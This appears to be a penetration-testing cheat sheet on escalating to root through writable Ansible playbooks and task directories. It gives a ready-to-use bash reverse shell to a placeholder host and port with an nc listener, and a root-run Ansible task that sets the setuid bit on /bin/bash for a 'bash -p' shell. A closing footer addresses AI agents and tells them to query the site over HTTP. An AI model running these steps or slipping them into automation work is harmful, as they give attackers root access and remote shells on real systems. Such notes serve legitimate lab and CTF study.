# Ansible Playbook Privilege Escalation

### [PrivEsc with Tasks](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/#privesc-with-tasks) <a href="#privesc-with-tasks" id="privesc-with-tasks"></a>

First off, check the content of playbook in **`/opt/ansible/playbooks`**.\
For instance, a file named **“httpd.yaml”**.

```yaml
- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
Copied!
```

Next, check the content of configure files in **`/opt/ansible/roles/geerlingguy.apache/tasks`**.\
And add the exploitable file in this.\
For example, a file named **`“shell.yml”`**.

```yaml
- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
Copied!
```

Create a exploit for reverse shell.

```sh
echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
Copied!
```

Then open a listener in local machine.

```sh
nc -lvnp <local-port>
Copied!
```

At the end, execute **“ansible”**

```sh
ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
Copied!
```

<br>

### [PrivEsc with Automation Task](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/#privesc-with-automation-task) <a href="#privesc-with-automation-task" id="privesc-with-automation-task"></a>

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (**`tasks/`**), we can inject arbitrary commands in **yaml** file.\
For example, create a new file **`/opt/ansible/tasks/evil.yaml`**.

```yaml
- hosts: localhost
	tasks:
	  - name: Evil
	    ansible.builtin.shell: |
	      chmod +s /bin/bash
	    become: true
Copied!
```

After a while, we can escalate the root privilege by executing the following command.

```sh
/bin/bash -p
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/ansible-playbook-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.